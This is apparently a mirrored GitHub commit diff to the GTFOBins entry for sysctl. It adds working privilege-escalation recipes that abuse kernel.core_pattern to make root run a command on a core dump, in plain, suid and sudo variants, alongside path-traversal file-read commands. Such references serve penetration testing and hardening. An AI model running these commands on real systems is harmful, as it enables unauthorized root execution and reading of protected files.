mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-24 13:59:17 +01:00
Update sysctl
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
parent
01042c2aa1
commit
21e0166608
@ -1,16 +1,30 @@
|
||||
---
|
||||
description: The `-p` argument can also be used in place of `-n`. In both cases though the output might get corrupted, so this might not be suitable to read binary files.
|
||||
functions:
|
||||
command:
|
||||
- description: The command is executed by root in the background when a core dump occurs.
|
||||
code: |
|
||||
COMMAND='/bin/sh -c id>/tmp/id'
|
||||
sysctl "kernel.core_pattern=|$COMMAND"
|
||||
sleep 9999 &
|
||||
kill -QUIT $!
|
||||
cat /tmp/id
|
||||
file-read:
|
||||
- code: |
|
||||
- description: The `-p` argument can also be used in place of `-n`. In both cases though the output might get corrupted, so this might not be suitable to read binary files.
|
||||
code: |
|
||||
LFILE=file_to_read
|
||||
/usr/sbin/sysctl -n "/../../$LFILE"
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./sysctl -n "/../../$LFILE"
|
||||
COMMAND='/bin/sh -c id>/tmp/id'
|
||||
./sysctl "kernel.core_pattern=|$COMMAND"
|
||||
sleep 9999 &
|
||||
kill -QUIT $!
|
||||
cat /tmp/id
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo sysctl -n "/../../$LFILE"
|
||||
COMMAND='/bin/sh -c id>/tmp/id'
|
||||
sudo sysctl "kernel.core_pattern=|$COMMAND"
|
||||
sleep 9999 &
|
||||
kill -QUIT $!
|
||||
cat /tmp/id
|
||||
---
|
||||
|
Loading…
Reference in New Issue
Block a user